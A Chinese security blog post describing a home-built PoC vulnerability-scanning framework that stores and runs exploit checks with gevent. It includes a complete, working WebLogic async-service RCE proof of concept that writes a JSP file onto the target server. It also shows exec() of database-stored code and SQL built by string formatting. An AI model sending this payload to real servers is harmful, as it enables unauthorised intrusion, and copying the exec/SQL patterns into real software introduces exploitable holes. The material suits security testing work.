100行代码手撸一个个人版“pocsuite” – 作者:六翼

距离笔者在gayhub发布“AngelSword”这款工具已有两年时间,这期间来有不少人star和fork,同时也有很多人发私信提供建议,也是在最近半年多这个项目已经不再维护,因为时间原因不再继续添加poc,最主要原因是觉得这个项目写的并不美观且功能不够强大,所以才有了这篇文章。

0x01 另起炉灶

有了推翻了重来的想法,接着就构思这个框架到底是怎样的:

1.poc代码不存文件,用到的时候直接检测出结果。

2.只要给出关键字,自动化搜索相关的poc轮询调用。

3.web层漏洞和主机层漏洞检测分离。

按照这些思路开始怼代码,先定义数据结构:建立webexploit数据表内容如下,vulname设置为主键,poc列中存储检测代码。

demo poc代码如下:

def _verify(url, cookies, uagent, vulns, proxy):
    pocdict = {
        "vulnname":"weblogic_wls_async_rce",
        "isvul": False,
        "vulnurl":"",
        "payload":"",
        "proof":"",
        "response":"",
        "exception":"",
    }
    headers = {
        "User-Agent" : uagent,
        "Content-Type": 'text/xml',
    }
    time_stamp = time.mktime(datetime.datetime.now().timetuple())
    m = hashlib.md5(str(time_stamp).encode(encoding='utf-8'))
    md5_str = m.hexdigest()
    payload = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><object class="java.io.PrintWriter"><string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/{0}.jsp</string><void method="println"><string><![CDATA[56540676a129760a3]]></string></void><void method="close"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>'.format(md5_str)
    try:
        vurl = urllib.parse.urljoin(url, '_async/AsyncResponseService')
        req = requests.post(vurl, data=payload, cookies=cookies, headers=headers, timeout=15, verify=False, proxies=proxy)
        time.sleep(5)
        rurl = urllib.parse.urljoin(url, 'bea_wls_internal/{0}.jsp'.format(md5_str))
        reqr = requests.get(rurl, timeout=10, verify=False)
        if r"56540676a129760a3" in reqr.text:
            pocdict['isvul'] = True
            pocdict['vulnurl'] = vurl
            pocdict['payload'] = payload
            pocdict['proof'] = rurl
            pocdict['response'] = reqr.text

    except Exception as e:
        pocdict['exception'] = str(e)
    vulns.append(pocdict)
_verify(self.url, self.cookies, findProxy().randomUA(), self.vulns, self.proxynode)     

poc代码存入数据库,每个poc都只有一个_verify函数,接受的参数来源于pocfactory类自身变量(后面说),程序执行完把结果存到字典最后再把字典放入列表,列表的功能当然就是为了遍历(配合协程并发)。

0x02 控制poc调度

poc调度主要有以下几种,如图所示:

1)单一poc->单一目标

2)单一poc->多个目标

3)多个poc->单一目标

4)多个poc->多个目标

为了增加速度,往往会使用threading库或者gevent库,这里首选gevent,之前测试过在高并发的情况下协程要比多线程的效率高一些。

接着编写pocfactory类,定义一些初始化变量,可以从外部动态设置参数(例如cookies或者自定义线程数),loadmodule函数的功能是把所有poc需要用到的导入模块一次性导入,这样后续每次执行poc就不需要为缺少模块而发愁了。

然后就是编写执行poc模块的函数runpocwithcmsname,这个函数接受一个keyword参数,然后从数据库中把所有匹配到keyword的poc代码全部拉出存储到poclist列表,最后再用协程并发执行pocexec函数,执行之后的结果都在self.vulns列表里,依次插入数据库。

到这里只有几十行代码就可以把搜索出来的poc一次性调度完,这样就完成了单一poc->单一目标和多个poc->单一目标。如果有不明白pocexec这个函数的作用可以参考我之前写过的一篇文章:pocsuite框架代码解析。而要增加多目标就比较容易了,这里我测试了两种方法:多进程+协程,协程+协程,最后得出的结果是在时间开销上只用协程要比多进程+协程还要高效,然后就有了下面的代码。

为了能够清晰的显示执行poc的结果详细情况,我又用logbook模块写了一个日志类:

class mylog:
    def __init__(self, logname, toscreen=False):
        # 设置日志名称        
        self.logname = logname
        self.toscreen = toscreen
        # 设置日志目录        
        self.LOG_DIR = self.setpath()
        # 设置本地时间        
        logbook.set_datetime_format("local")
        # 设置终端输出格式        
        self.log_standard = ColorizedStderrHandler(bubble=True)
        self.log_standard.formatter = self.logformat
        # 设置文件输出格式        
        self.log_file = TimedRotatingFileHandler(
            os.path.join(self.LOG_DIR, '{}.log'.format(self.logname)), date_format='%Y-%m-%d', bubble=True, encoding='utf-8')
        self.log_file.formatter = self.logformat
        # 执行log记录        
        self.log = Logger("SatanLogging")
        self.logrun()

    """    日志存储函数    """    
    def setpath(self):
        logpath = os.path.join(GlobalConf().progpath['location'], 'Backtracking/log')
        if not os.path.exists(logpath):
            os.makedirs(logpath)
        return logpath

    """    格式化日志函数    """    
    def logformat(self, record, handler):
        log = "[{date}] [{level}] [{filename}] [{func_name}] [{lineno}] {msg}".format(
         # 日志时间            
        date=record.time,            
         # 日志等级            
        level=record.level_name,            
         # 文件名            
        filename=os.path.split(record.filename)[-1],            
         # 函数名            
        func_name=record.func_name,            
         # 行号            
        lineno=record.lineno,            
         # 日志内容            
        msg=record.message
        )
        return log

    """    生成日志函数    """    
    def logrun(self):
        self.log.handlers = []
        self.log.handlers.append(self.log_file)
        # 如果为True将日志打到屏幕        if self.toscreen:
            self.log.handlers.append(self.log_standard)        

0x03 测试检测结果

这样基本骨架算是写完了,然后测试一下效果,目标是笔者跟朋友借的一台存在漏洞的weblogic。

在数据库中查看检测结果。

在log文件中查看检测结果,其实跟数据库中的结果大致差不多,只是response内容写进了日志而没有写进数据库。

目前针对web漏洞的poc框架的雏形已经完全写完了,核心代码只有50多行,而针对主机层的漏洞poc也采用相同的调用结构,只不过一次性导入模块可能略有区别。

还有个区别就是如果一次性发送大量请求给web服务器,每个请求都相对独立,可以说是请求的结果都相对符合预期。但是如果是主机层面的,可能一个完整的检测过程是通过好几次发包来获取结果,如果高并发的情况下会破坏socket包请求序列,这就导致有些存在漏洞的目标但是你的poc并没有检测出漏洞。所以针对主机层漏洞采用的是队列的方式,设置阻塞,当多个poc攻击一个目标的时候,让每个poc都呈现“排队”模式。

def Consumer(self, pocstr):

    while not self.queue.empty():

        data = self.queue.get()

        sem.acquire()

        exec(data)

        gevent.sleep(0)

        sem.release()

def runpocwithsysname(self, keyword):

    try:

        poclist = list()

        self.loadmodule()

        sql = 'SELECT poc from hostexploit WHERE vulname like "%{}%"'.format(keyword)

        res = db().execute(sql)

        for item in res:

            poclist.append(item['poc'])

            self.queue.put_nowait(item['poc'])

        mylog('hostexploit', True).log.info(pyfancy().green('[+]针对目标:{0}:{1} 加载{2} hostpoc {3}个'.format(self.host, self.port, keyword, len(poclist))))

        threads = [gevent.spawn(self.Consumer, item) for item in poclist]

        gevent.joinall(threads)

虽然用队列把多个poc对单一目标的检测给阻塞了,时间开销变大了,但是单一poc对多个目标或多个poc对多个目标发起的请求还是高并发的。

总而言之以上这些只是一个比较完整的架子,至于最基本的还是poc的累积,而自定义的poc模板也尽量是代码能少则少,只要一个函数就可以把漏洞检测出来。当然你也可以在_verify函数里写复杂的类或者函数,实践证明也是没问题的。 对于需要引入外部平台检测的,额外写个GlobalConf类,里面定义好接口地址,这些只要进入交互式终端自动加载进去就OK了。

0x04 总结&整理

虽然笔者起的名字叫100行。。。。这里的100行代码只是指核心代码,而加上数据库管理的,poc代码的和各种巴拉巴拉设置的恐怕也要超过几千行了,核心代码笔者已经上传到gayhub,可供大家参考拍砖。

*本文原创作者:六翼,本文属于FreeBuf原创奖励计划,未经许可禁止转载

来源:freebuf.com 2019-12-21 09:00:24 by: 六翼

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论